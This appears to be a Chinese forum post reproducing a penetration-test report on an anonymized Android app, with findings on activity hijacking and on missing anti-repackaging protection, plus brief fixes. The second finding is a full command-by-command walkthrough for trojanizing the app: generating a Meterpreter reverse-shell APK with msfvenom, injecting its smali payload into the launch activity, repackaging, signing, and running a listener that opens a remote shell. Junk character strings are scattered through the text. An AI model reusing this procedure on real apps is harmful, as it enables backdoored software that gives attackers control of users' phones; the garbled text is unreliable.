6 E9 |* `/ s, D4 ~% z3 S1 p \9 _6 L# x( V1 A6 m   4 j- C. `# Q+ T. D/ W 8 l. n$ ~0 C/ _( ]

% b8 t4 X* p, C$ @: y; L: C/ `6 P / t5 G6 {2 x9 C9 ^3 K, E$ s8 D% {

. f/ A) I$ f* h$ n# X" Z$ e$ s 8 q1 w; B3 C! A: Y 2 检测结果                    7 P, a5 r* h: r# {9 m0 [4 P - v5 a* f$ q5 _ l7 w7 a7 @+ V" e

* p* Y# ?* z' I2 |2 n6 X . |' t% B4 s$ F$ Z3 Q% Y' r' T- q

9 Q$ M) u; [# r+ a% a . b! J6 r2 f- [% R 2.1 某某某 / F8 t7 [8 _6 ^ " c0 W5 X+ o5 `- H" F

/ k- m' A8 P, k6 A ; ~# u8 F: a( o) `

; m, D0 \. Z1 ?% m; b9 M5 }( R* T) M9 @8 b5 q8 _ 2.1.1检测目标 & B. l1 a$ K$ M5 T4 w7 R% R! K" W2 t! A0 `

- h& }9 `7 Y8 o. W8 T2 ]2 ^/ F; G+ _/ s$ j% u6 ^2 w

) R4 n% x3 ]3 B# v& x" T & o+ E. @2 w- i- n1 `' O 目标地址: 某某某某某某APP - v; H e/ X( I* o9 W6 y1 c' W: | ! I4 j7 P0 J- p1 B7 n9 L4 j) |

* l6 X; c( M' j3 U+ ]* g; t5 o% T3 b q- Q% L4 }6 t# Y' Q* F

, `8 m* e- ?% Z ! N0 M; ?& O* M! y8 P* C6 `9 h 2.1.2检测结果 & p% T9 C+ E5 I6 ?8 W; j2 ^) Y8 d% h

; p7 Y: c, m S, X; O h ( H5 v+ ^5 d0 W8 Z, e# j, t& B

; n! a5 ~* i8 N7 W `7 s( U 9 A$ r" F9 w* r, d! _, F. p 2.1.2.1 2 N/ ~7 S' N: m 4 a, p' g3 ~( H/ [0 H

) d7 Q& G4 W' k# s, P; p 9 C0 E$ A- v' j! f2 }$ i# C8 O

( }4 w4 w4 K _/ v% W5 `2 e - s) ?6 w' d' a- ^) {0 v 漏洞链接地址:某某某某某某APP % {+ w9 W8 I8 z7 M' [& a. e l( B 9 Y& \: l3 h- n/ T0 R

) G5 B# b5 i! F) ?0 B - e' `7 F3 F3 \1 B$ y

/ ~' [7 I+ l! X& C, Y , ~3 A$ W# w/ Y4 U4 Y, }9 F   9 I, C9 B* P6 K! S2 X4 a. X 3 Y; E- a1 W# X) p# \2 \8 l

0 s. M" a# h+ I/ d1 M. f' Z% K' B* k" g N- F: `$ m& k, ]

7 w% r3 W. G! |5 m5 v% b j. L/ N. {* z8 H4 X1 I% ^ 漏洞分析及取证: ; j- P1 W, ?' s' U1 m# t: g 3 M0 {- Y6 z9 K3 A, a

8 S4 P; ? ~; W4 a. O: [2 d 7 O% T! K9 a/ ^- w2 P4 x9 G

; u, g& m. Z8 X7 R, z' Q; T# h" I! p: P! _* s                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 8 Y+ M, }( B" p5 N4 ~ 7 K0 |; S1 Z9 Q# h- C$ d

7 |# I7 I' ^3 w8 F2 ^ m + `% [( P) q$ |- k' S, B( p

5 C, `. u' b0 q- [0 |+ i N . W+ Z5 Y# u }- u4 g/ y/ N; |4 r; z      * X2 B: E* P6 h( D3 Z6 G6 \$ z! E! d8 m7 h# u, _3 D2 X3 i$ ~) ]7 v

! \+ }) n8 A) s) M * ^6 D8 _& [8 r) H

# b4 U! N+ S* a b+ b% W6 R, c! F% Y 2 ~/ @% p$ N8 R+ S" V& n# W                       + _+ ~, F$ P6 G7 S , q; E! C2 R3 N2 h/ ?: f

' K3 E: f" h- k6 i3 {. ^9 R, _$ r- Q. v# a$ \) ^% _, X

4 Z. i3 }1 n4 y/ S4 b( j, S9 ?! y& E' Q ; F: @9 S* n \& i! H 5 B4 n/ U" a$ d- F0 ]

) J( ?/ Q/ P# u* j k' m+ j5 v& V ' c9 Y- l& V4 \ [: h

8 n, ?2 a2 s" B. ~ % j1 A0 \4 C; \) \. u& a5 M3 F ) n! s* A* v6 L" B, E& I! ] 0 \/ ]' k" G' N0 ]" b- R

) ~# s; Q; O/ @2 _$ f+ S; P/ f1 X+ X0 q, c2 T. `

/ G4 G2 K8 i/ e+ j) Q9 V) Y6 V' L9 ~( S; G " o$ `: h4 ~, x1 D+ p 5 w- Q4 `' ?4 O, A$ e9 X

0 p& l# Z2 u" m. D* w ! J" V0 X4 a# Z) a

V3 ]$ O' [2 n% P+ o4 A3 g9 V, v0 B1 } 漏洞危害:高 ; D. t0 |( C& [ 6 B; h2 \& ~* h

8 l7 a) ?0 _( i" U) q - r+ y1 I. [0 P3 u7 Y/ ^' T
* y' y# h8 w i 9 R% E/ M/ t: ^8 f % e9 W. i) T; V" W, G m8 s4 p% o8 O, T& f# }) U( w: v1 B& {1 f) N$ M1 Z. {+ W7 R; O9 N2 H; A6 M* d, ?: r+ S) O; h% n3 }# E) n7 k, e. h. P8 z7 j! J' [' @" y4 q: a- H) h6 v# `/ s4 m% G* d1 h1 E3 z) O: R: Y% _( A2 W, T6 l! l, ^" B% _8 a. Z( E f( x! G D: s4 w( H) o7 J/ v: N6 q4 t# Y" @8 n z0 v. y3 ~" a) G( L; C$ D' g9 w5 ?9 l q$ o, w, t" v% S ]: G( j: L; N- d( C7 ~7 j& P5 `7 i! x, B) m- e' p: |; B. D }3 W6 L, ?' n" F9 `: h- O& e4 n' L: b1 t6 z8 f" Z3 n, X3 \# {6 l4 @/ d5 n1 z% z* l& O' w6 w& j- ^% l( R1 u9 H g, T. q4 f1 j0 T e3 Q8 P5 }& W7 V2 M9 R8 b& n& u
2 d# r0 j- ^8 A, L! W# r+ q' H4 a- J" y

) E7 n# U1 H, ?4 {" A. q; c8 a% A: g( |8 _5 n" @ Y 严重程度 5 M( g0 ^' u; u) N . F$ o1 T2 D$ y4 c. j. ^. p

! E4 W; k/ R. q 9 @$ J1 q- K _
% m7 Y& F3 Q. H& p: M" p. O8 e) E; t8 {6 R& c, n; S1 J

+ a! M* ~ O% R0 ]0 E7 e ; U% O5 o* D% D& @) ]4 |: b & G2 G0 \& s8 t8 D: F" w: G2 |# c$ O2 \

, r7 t7 x7 B9 B" O y; C9 l# D6 ^' R 7 d& S* y% P3 u2 p* d1 b( [
* F2 p" l0 Q) C% o0 Q4 N8 n& p& H " P: C% ^+ Z: E/ {

( T0 a8 m0 D# Z+ I3 x( b' N ) s, s" D! S* ` } 3 E$ ^" k6 b' Y9 Y5 f' H$ L ! ~8 g( }' m2 M; I

9 `$ c9 j @& W2 H& P. H ; e5 f4 t/ j9 b2 q1 K3 c
* X0 h( c0 S/ u( P2 z# R9 r6 ^ - F8 `: e; j- G# Z/ n. p6 L

6 s- U- \2 [& M8 O% U / B8 b+ |7 [! S9 u# D4 o8 e# T ! e8 [! \1 i5 v% i7 @, y: \6 |9 S+ N8 G' ]- m, c1 Y

1 r& {1 Z- N9 {- f) z7 k- V ' i. z5 A, p9 O# f( m
7 n( m" f) ~/ l5 B" Z! a . q6 v; l$ a0 d( f% J4 t

: G+ R: i9 ^( ?% M' I) t * c8 O% F* I* G" G P   " o7 n. E4 p4 C: D3 n4 T . o9 v0 H/ D6 `( F

, |( }2 l! ?1 x . a I1 q2 A" @9 I7 N n5 U
j* s/ E7 u( x3 G3 ~ ( G2 x+ K+ y5 F7 d4 l, j

2 d6 n2 m/ Z' u$ ^: r0 _8 R 9 @/ @9 A4 d! |1 M3 ], w 2 S) X6 g' z3 G5 Z. i + q6 F) v$ h$ F9 s

* Y0 p+ ^5 k+ ^; _$ x! H2 ?* _, N
" D8 C* h6 Q; ?/ i , l- [+ g! d7 u# b$ Y

( e/ i( `* v$ P! v7 t $ C# |% }( ]9 k% [% ?. o( K2 J' l   , ~5 M1 i0 t* @: D: u$ V0 G2 W( f2 e5 _$ K% ~/ f* V! }: r

- W) [( c5 [* f5 M0 q ) @# b0 N) `1 I" T9 f
! h6 g; W- j" i# O3 X * r6 e |% X8 B+ a4 J( {8 e
4 B" D, b' `; |' } 7 l# q1 E; F' B n

3 R! P! S2 Q1 G, `" T$ z" Y) ]+ P! d2 }* t; E( t   4 ^$ {4 b/ [' ]7 Z) B. v( G$ l8 E0 m& P

) B5 Q# n% `% k9 G4 m 7 [' E5 b1 t! b7 i. m

9 U" {; d: z8 o8 U* f2 e' T 8 n' p6 z. u: h- S8 d1 h 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 , r) S5 n D& n; `. O 6 i% [: }' ?. ?- k

: Z; k0 T3 m5 P P! |3 `, S0 p* B& w( ?5 z K/ h

t: m8 x3 g4 y0 R2 X4 n* } [! z# [! H1 C" ^4 p8 Z           1 _6 A( i: ]( M# _ - _& M9 o+ ]* p3 E

; n% [ y+ P4 E* N. g7 `: @ ; T4 C9 x- y( f: g q. C

' ?4 R" C/ Z0 ?6 c# U d / T. q( v2 _6 I+ a( i   + ]& _& B2 q6 ?% S5 ^- R" C$ L3 x3 @# Y' Q+ t6 |5 i5 w

& x8 C2 P/ ^* o. r* k7 M9 E, V, Z: t8 H. x( e @9 z

1 ]7 X1 f: n: p$ y# m6 I5 o5 U: E6 B/ b0 @) f, y; x 2.1.2.2 / t1 n9 O/ O0 P, q; F$ e 5 n, Y, O$ k4 _. W4 v4 E

0 A) I6 \+ ^% B( F$ [, C " E4 e6 ?3 h4 {3 @) v" t9 N

: \- M* ^ u* b% `% w7 q # t# F0 s. d" M6 Z 漏洞链接地址:某某某某某某APP ! h2 }* j' _* b- s/ Y7 {. z9 C2 b1 a0 ?

" m* D& {! [; |: g: C( T+ g 9 g! z0 T5 _ D

" H! ]7 _1 T6 s+ {6 a( m5 } 8 V: |) O h% O% M/ Q 漏洞分析及取证: ! _4 N+ U/ e& D: x) v4 r 4 N/ i3 \7 d( X5 d1 q H- d# L

" `0 U' L1 V3 Y4 K- p! M% ^/ m, X7 E: y* L) b, N* V A

; a/ X; \: I. [+ }; y, u $ b6 E, K7 G2 _0 ^                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: & ?; Z2 U2 l; }' n 1 p- x0 h, Z' |+ }3 T. S5 j: p

2 \) H+ e; M ]+ `3 I ' c7 |2 r* F5 G

( K) v% N; U0 Y: d% q 2 ?. [; q% ]8 a, C Metasploit 生成木马 apk * ~1 n8 [2 j0 w9 r A# b0 _ 5 x$ f; i- C* N& F

+ c# z" | Z" ]/ { N/ a& s6 U6 ] 6 \2 {/ T& O$ t' j) U

+ L6 M! c0 m, ~ s( u1 ~0 f0 Q, V4 ^0 ?$ e2 Y msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 4 e# U. N$ k/ y6 z6 I 8 o& d$ ^4 T- _0 j8 k! l

6 H. z1 f' h" ]( h6 l8 N 1 K/ n+ Y7 Q- {3 e: J

' }7 A+ A3 B1 @) L0 o! G A& P5 h # Y3 ], @+ y1 M1 Y 反编译目标apk和木马apk 2 m, e, i# ?) Y/ B. m6 c9 e% h( ~ $ ^7 U" h& c2 N* Z S( @6 h

9 j% P9 A$ ^! o3 d% r$ | ) S* E5 o0 X- L* A* L

, _. q9 K W$ ~: m # p" g- u6 `3 e apktool d target.apk
! @2 ~$ }" n1 k5 Y. s- n3 i0 N( z apktool d cockhorse.apk
8 [( m( b3 m+ {6 t - e* {1 d* E5 T1 t( H/ _' F

0 b* P3 ^" _) l: q. ~6 b5 P7 h ) _0 u; _6 d& u6 ~

9 q. y; N. m( W1 v+ |% i) \ / S, X; }! T! P# T 木马 apk 注入目标 apk $ w+ `! N4 k# C" S3 @ $ A# i% }1 Z* \- l

, ^3 z% X4 k: Q3 H \+ c8 z+ h2 v' ?4 K5 q

" o0 r7 O: \; P2 ], f 9 u+ \$ l( k, x' ^# ] 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
; E/ r3 u, @& J7 s8 o* {: T0 `4 b v" Z! \ invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
; x' e2 t O8 H: Q8 _/ J u" z0 G: M+ j( S

# a/ ` }3 s" b5 w# x % M0 X& o/ H5 o- H4 Z, c

7 i" N2 `! J$ a z9 z - x& k9 ]3 | o3 c8 o4 }/ M 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 8 c9 `) E x' F0 K7 \6 u4 F: k# n; q" j }5 l' I

) F% a) u& u \% @) n5 t4 X h / R0 m1 t8 h, G( K( Q

/ J8 X$ N1 Q* ?& d$ _+ f6 ?5 b " e9 b5 @3 I5 ?$ C! b" U 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ ! y/ i& B2 |5 R4 X " `7 Q. w3 R+ ^0 P4 \* K: e7 U

- c! {7 x9 G* q, t % ~' Y. F6 s) G; A2 I9 e

, i, q+ |) _8 ~: Q6 |& z4 M @, p . J! w7 A: B. ^1 k3 `5 S+ `$ _2 v 回编译生成最终 apk 2 Q2 v7 t& g# q5 Z0 P# l& W/ `% g8 W% P" ^7 W2 q9 q q! r; r

5 z+ N# z# z' ~. l# S# x: e " [- B0 P. s+ A! P

% u, o1 N' k8 t0 l+ d, w- r9 b3 H 0 A. U' V- z+ i) i& ^ 重新打包 $ l5 \" }2 r, P* L+ _4 ^' ] 2 e! D5 z! v# L; h

9 n* c7 g' h! t/ t. K: y / g0 A; F% L+ m) V$ e3 ` C

1 Q! F* \ p1 X8 s- U9 b3 @. j1 }6 H5 K apktool b -o repackage.apk target_app_floder . W1 ` Q1 B0 B" J h! u+ t( ^ 9 W6 k7 _/ o3 e' h2 o

3 j' J! A$ E2 q 8 G' U K+ H; o+ [8 x" m

9 y& v x6 t$ ~' i 8 b: j8 O B7 X2 V8 Q/ o% H 创建签名文件,有的话可忽略此步骤 & ]+ b' [ X8 ]( M/ j . `$ v8 U/ e5 ~

: i% E3 t3 l) o6 ~1 B" Z; S- s' J8 p: t. R* w+ V

8 e& |$ v3 m: F, J% ]) _4 R- m) |% N* O7 D2 x* b% C keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                : f: U H+ i; l - b! C' q, Y$ w1 M

5 C( O" i! v! C$ a+ z 2 s% s2 s2 v [! l7 a

9 I8 P7 C/ r2 X" b7 J% ~ n* C! H; e$ a: N) p 签名,以下任选其一 4 r. }( L2 o( b6 |3 e. X : I- ~. }) J% P. X, g

7 r, h: j* s: F: w. }: p, L* | L! Y F! {1 X

. Z* i, q, Q( s, c0 `+ J! @, S8 l; r: j3 q" n5 o% T jarsigner 方式 # p5 r V/ d& n9 F; l8 Y: ` ! R0 [7 c$ D4 @4 f- q

5 X2 i+ s" _% G' Z1 O; C. S5 d) w) \4 Z

; f3 F8 q0 J1 x" a! j # Q# C, ]5 E4 v0 I7 t jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ! e5 y1 o2 F1 j; a, f& p% m2 H! Q8 Y5 N

( }; y6 b3 |% a- f 3 B1 h) j+ N6 G3 A4 V/ _8 j h

' b' t$ T/ K4 B# z T) { + @1 s r& t* F apksigner 方式 4 r1 c+ s0 O* c% O 3 ]) c, F3 s5 s, ^, o

2 W7 r8 {" G* A& p& j' _ ; P# V9 M4 w9 A9 g

! x8 c ?. W' m; ?1 s * A/ m' V4 I! \4 Q3 X. f apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk : e. p( M/ ^; B6 m9 q( F- c / S0 W% o7 f3 e+ @

& a/ y" ^, z# S- w( k * ?+ H5 w( H$ {' c1 I# n% E+ u

7 |9 Y7 T) A ?) h8 A* t) p; w ( a: ~( G5 d4 @7 D& Z4 M 如需要禁用 v2签名 添加选项--v2-signing-enabled false " W, {* I4 f0 ~ 3 K. f0 a! C) S; B) w Q) R& @. [3 D

' N) @9 M/ E; \( ^2 p) E* G4 N4 s+ Q( j7 p0 z

/ p# n* s9 \4 u( H8 k 9 N2 T7 b0 l4 c2 ~ 验证,以下任选其一 6 N$ H1 |5 h7 k/ J3 x x1 e$ N' k, y! L; @3 t7 K4 W/ J

5 B! V: ^9 W @" G" J 1 y6 [& G# Q9 P- T: n' E

! T' C3 g4 S4 x. P2 k* \0 L, S+ z1 S5 U' z8 B6 e; ^# C jarsigner方式 8 ` a, p0 S, X, k 4 `' _) b8 F/ v) d* e

/ |7 O) `& [" N, K9 t 3 N0 ^3 j6 G# e( z: J" {

' y* o. S8 C2 I1 E; x; O( s 5 N; O0 |. ]$ n' X. O+ u; Y jarsigner -verify repackaged.apk ' T0 }3 `) ?8 o ; Y) K) j+ P) \. c# b l5 f

! f, y8 C& I ]6 t" D& w: z0 W8 j! i

5 {/ i# i" i3 P" y * S7 k2 s! }" y P% P% D2 Z apksigner 方式 0 F9 ~$ r$ I" l. B. a- j 8 \& [6 h: d0 [: U0 p$ c( f

) e5 P8 P3 v0 c8 a" U4 p" c: Y6 X2 @* G# I& @* [

- U8 G# p. S( b/ _. x: Y 4 M/ M8 I: b2 I# p: r apksigner verify -v --print-certs repackaged.apk 4 V* o0 C$ }7 h. w# C/ \( U( ] ! b( U- S! Z, M- S

9 e! N) }- T4 I! g ' C: }9 _$ c4 w) }, p) m

$ n0 N9 I3 o2 F0 @3 I8 j * `3 v1 h. L/ t3 n; a keytool方式 ; z+ ~: J6 p3 E5 I8 S' j a t( `, D6 q+ c) D

4 x0 d% N/ |8 f6 y/ n* W % I1 M( N, \+ g N0 Q

: m7 a7 H$ i1 F! Z: B% ^ ; z4 Q! z8 J% J8 T' r6 T keytool -printcert -jarfile repackaged.apk - d5 x( F' q4 Q4 w1 r 3 y: d9 d I0 k9 O. I0 H7 g* W

$ G. B3 o5 h9 r& Q% m5 U; Z1 M9 m* {2 X, q b1 `

2 X$ w' [0 R: p1 F0 u ; @$ s) e6 |' i2 Y& l: C. A 对齐 ( T4 P& ~0 L3 d% C ! l6 n& e$ [; u# g7 x

9 J- S _" ?1 @! Z * J0 l% c: n. d$ j: ~

5 {* d: K, o) k8 a" f& T) | + I/ Q" ^0 o; @) q8 @/ ` 字节对齐优化 0 t+ [ R6 Y- p( y& u$ a6 H' H, Z * w0 V" n* B2 ]! f/ Z) Z

3 o/ K; R; e# s* E0 |6 f, C1 ?/ T2 u5 y5 D) m

5 Z7 T2 O( _) ~1 q+ c; A4 `* x8 h5 N, i4 S% m zipalign -v 4 repackaged.apk final.apk ~# T/ q8 _+ f* f! s- H 6 v% m. v! V' n! Y0 i( U0 G

4 ?1 t5 N+ U' C Q* ?- [" I ' a8 f9 @) h" x3 Q u/ k: }

# r4 ]+ q1 D" k* v ; H/ ~ f `# U) c, i( J4 J 检查是否对齐 / p! c) D% }% G' g - v$ n9 B# b% {9 u& O) p& q

9 g2 S/ q9 D+ ]: i3 d 7 O, ?9 Y2 M0 x8 Z2 C

# | g( Y8 g2 p; Y % k& y$ V: |- F; M8 [- T2 n zipalign -c -v 4 final.apk + Y6 B7 s8 a3 ~0 J2 S 9 T$ g& f% X1 O7 R

4 b6 l& L* M3 i7 ^0 v ) Q D) R& ]3 T1 c/ P$ ]

) m- X0 ]9 ]1 u' p4 i- J0 B# Z# |& Q0 @3 E+ p/ x' q1 e$ X 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 4 Z3 L: j8 j9 O' C7 x) w8 k' C1 s' i

' ^2 l/ l4 N# m2 v5 p8 \( P $ ^- o, i' r7 M! T, M6 X

& _2 b! r9 Z6 b& q8 d 7 X$ \. F; \# N 启动Metasploit控制台,配置参数等待上线 ( Z: F- T) V) F7 P# u * P% i% F6 _/ W

1 _; D2 R6 Z6 F - d8 B9 p$ e% b

/ ^1 h3 k t0 n6 g& ] . G( G& W, Z7 u W) d; Z- U( D W 在终端依次输入如下命令 8 m( G* h0 I& d! o6 a4 H- Q1 w- o3 F! ~) [! o

7 N, j( l5 p! |2 g* q( X" w% |# H3 U) r2 Z

: K6 `/ [) q5 f' n* ^ + y3 k, Q# e) T+ u9 l7 R6 h ` msfconsole # {' O y1 }3 P! ?' H' X 3 x7 m; n, G+ O8 s

0 a1 A4 D6 a3 E9 O* { 3 X! T9 V) |4 h9 V

2 d6 k5 P( C- t, ]* S3 U* ]/ t ; F7 D! ~& Q. r* s" l }3 G use exploit/multi/handler ; S2 L. |6 g7 K2 x( o# u + D$ K! Z( X, X# X$ p. C

7 j6 {/ `5 h! ~2 G+ R% d( w) [3 e+ ~2 c4 W9 C& v( W2 |

0 q d5 P& t7 c$ z( H . X/ X1 v: J# J i2 m2 N0 C. @ set PAYLOAD android/meterpreter/reverse_tcp 7 K4 X& m2 |) A3 i$ _* O- l5 ]- D 7 c/ v8 X6 \4 U& T

# {/ D% m2 N" ^4 t" b: F 0 r+ { x1 [2 T

1 a& D% N) ~; b9 M2 V$ E: q 6 j+ J1 m8 Z) M; Z set LHOST 192.xxx.xx.xx : {& S: T6 i3 R; L5 f 1 X x5 x5 H# N/ M& u

6 z6 f3 E( R! q6 `/ ^9 Z , l, n% m6 ~0 T- g

/ R* Z: Y& o ]0 y% m# S - d8 ~; y0 [6 g: s/ X' U set LPORT 4444 ! }) E* O- k4 w9 N3 R0 g+ V8 c6 V0 C" }$ z1 X8 H t# S: s

6 G8 x/ o4 A3 v: v P) R & ~# F1 T4 C% ]0 Z. G1 B

5 Z$ G, t" n) R. E" {$ l; ~ 3 B& Y' Y' ?' C7 n& v1 w4 F exploit ! \$ ]/ Z3 S" N0 z7 v, f( _# ^ - a: i4 E1 [6 h: e6 V7 \

" m( H% P0 R& r9 M/ e$ ^& W" B% A, }. X# e/ M

7 ]7 j" a0 [! ?4 \% x. Q7 q & R L, V4 s W5 p: i a, Z' F 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               " K8 y+ i9 S, f/ @& ~$ g9 E# C. F f/ W5 i4 O" k+ b$ V8 `

$ |) P+ r/ K4 w" Z# `8 M9 s X) W) w1 n: f T' v

7 `$ O/ K( P8 V3 t , P) S/ h& T; I" ]& Z$ M `: l7 d 漏洞危害:中 6 v/ N: [/ X |6 h0 Q9 S % }( u# W* a( n& [: Z

% ]3 R7 r. d# t' q9 k . z! M5 u3 u# L2 l3 u- ~1 t2 I
) j2 R+ M& z5 P2 y: p7 w9 \! N. ~4 @: g; S , c @ e& L) l/ m+ {) @5 M ! z, L5 W9 V& |$ n) n* \8 K ; A) [- j7 H I) L; \/ i5 d# [7 f, X; I9 M4 \* d' I9 H; p: T5 T; y) C s3 |$ E. V7 ?* N0 l# x6 I W( y7 G( v2 o1 o, F+ n3 U' r9 _! { b# p' a( u' t* K/ V: h0 o7 a) F. z, e( k S) t/ Y, k! _+ _7 e; S8 q9 R8 ]* [, `0 z1 E3 u* l& o. @- h6 x; ^0 \% z2 R* F% b3 i1 U6 F% w1 p! P, z! x% f% [, o4 }. K' I2 F6 Q9 B4 [0 ]$ f2 J3 T2 r2 H) j9 ]3 `. R" R# t( `; u4 Y! B1 g4 t( E ^; e, k2 c3 b: F8 |0 K0 a" h* w( U2 `( o6 a1 f6 O6 J9 W2 {0 d0 h* }+ z" R1 @" F8 ]6 C: e. r* g2 y" K5 l" V4 K9 C4 Q: s+ {1 P- i; x, r* H7 Q+ l( I. y+ ~. f5 n: h+ B# D' D% e$ y" @4 }" a) t5 |) F# X) R+ t; G) E
# {3 J2 \% O' x _$ R- b# s( { % D/ `' D) D# f1 {/ ?" s

2 C: B7 k5 i1 r4 `$ Z 2 k* |9 ^. B* t5 ]. Q' [& N 严重程度 + C4 s0 I9 u0 A* Q3 X$ g! j. o2 m" y! W7 i& v

: Q. j# \; q/ _# P, Y : o( _- k; ?1 X- H8 N
' H/ f/ D, w! j) g2 {: {) U6 p6 S3 ~ 9 I5 u* D, e3 D$ ~; q J9 s

( M4 U C7 ~. `* }9 c ( K! I1 q6 n$ ^2 F4 O 8 V7 }& n; O0 ~& ~5 y$ R & ~# e! {1 m9 p4 V

6 e l" ~/ r+ [8 r% q$ r ! C7 P+ v& o) K. H, ?
$ ?* [5 T9 r$ M7 O6 q ~9 k, d" ~9 Z. M+ D- ?' m W

`6 W9 \; t: B. S/ c) g. b0 W6 c. k8 J( |( I: y. l 8 P* j% P$ v- y( h6 w# h& y$ a' t( k2 M+ E: O( U% l4 Y, _; ]& }

8 }6 G! b/ D: }. Y# \; g1 c W ' z/ Y* m& F. x8 z: X1 [
9 }; E T, v/ G" X* b% \+ x& D1 [1 _ & A$ A0 [% B* V9 [9 Y

* L8 _* b+ f* o3 w& v2 [% p , _4 q8 B8 D; v/ K: n4 o0 e ) ]3 R2 I# P+ B) g3 E; w- O $ }/ \0 c/ P7 Y4 h) j

& I6 [3 x2 y: I 9 s6 v+ k* P3 L2 P- l
3 F* ]5 I$ T7 d9 U$ x " |% E/ l! L2 x0 S 2 `; S; Z; X6 F% V( |$ t4 j% T' a0 c0 ^0 ]+ J7 z- ]' ^0 S4 T

6 n2 y: A: a. U% b . O: ]- S; H+ b0 d/ K1 t7 |. y   8 H ~' d' {1 c: k @8 F! K5 a" j0 x) b( ^

2 @( |1 Q' x6 |, E, K" {3 f( w( }+ c; n' Q6 i @3 {: E! Y) z% k- V" d" }
. f9 K- P5 F m" }5 x ?9 K3 a+ N4 d: c

. F& ~" x c% C; E / k0 F- ^5 p0 s4 D$ W 5 p( `" P. U+ Z0 [ % M% e, N" V% |! h1 {- a' B

; u9 Y% X. z7 B) `& ^ * n: q5 F% \" m }* J' x9 H
$ u& n# k2 ^/ @0 ]# ?% H: X 1 U9 S- ]) p3 U& @9 i6 W* m # ~. J/ x+ a& o$ e5 c2 M9 E5 c4 L. z; e, L+ R, G

( T7 N( ^7 n8 G/ p" S# J9 h& X( g7 _+ W2 A! L4 D   ) x: A, g) A4 V% o7 Q5 p, ^: ? f; A. p) {) t$ t

$ f; a9 K" m5 @. F3 j) a ( Y' W+ {! C' e+ S( X' a8 {
: G0 E! N |- G+ u" a6 z1 k - v' v w& l: x, ]# E
! ]' m+ E# s# [ / M* {% M0 f0 B! `

, p. M+ V- U' `; i 0 p! x- R$ E4 ]8 [4 g8 r7 |" F- f; p   ' ~0 x: r4 W; m6 ^# c( m' Z" Z" i+ L* X9 H+ U. Y

- I+ m4 x2 j4 a$ J( j$ L . j6 N1 {, y2 j! I& t, x _0 \

4 z/ l! f# c- I. [7 I( i/ F- L, W4 ?0 ?/ g8 V$ Q 修复方法: , n g9 X& U+ T9 {8 W8 x8 D$ X _ % l7 b& r) S* r" W8 O5 _, l n' k

, D1 J8 O _# b# Q$ h 2 _3 C' I$ k C! |( { W2 P

. h# g/ ~& d3 T3 j- z/ j" q) M. K* I2 I( n3 Z               1. APP 启动时应做签名校验防止二次打包。
5 |" L/ u4 K% z/ `% \- D' g1 e% l" U4 q$ q( m 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 6 a' H4 q1 P; m7 I9 T * x9 U0 c) W8 v! g! I& Z

$ E6 l. G% i O: R8 L9 l. j: b. ` / g! N0 X3 A P! Q; n ' Z, _8 m- W+ l. e0 D9 c4 M* m/ m

# |( Z) ?+ @. ]% l3 I) s D : |5 I0 k4 @. m" \) n, g+ T( w   6 e# V" y- @. z7 Q x# W2 P+ B: m , E* ], j/ `2 w3 c0 I8 N: G

8 l6 o9 D1 ~/ J' {& S * l5 N2 `- @# h ( z, F3 f$ c3 s% c7 J4 X 4 I, M) T) v# e+ t

# v* A, z" v! k6 m2 V 9 Q% Y# F6 E. Y' \8 K a+ V
4 O; C% x2 b1 |/ M- F- r / ]& d, m+ B; p2 ?& M

. g' E, ^( c% P& Z, \8 V# a, c% A* D! ]% g/ o; @+ P, }: z( d9 b6 |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表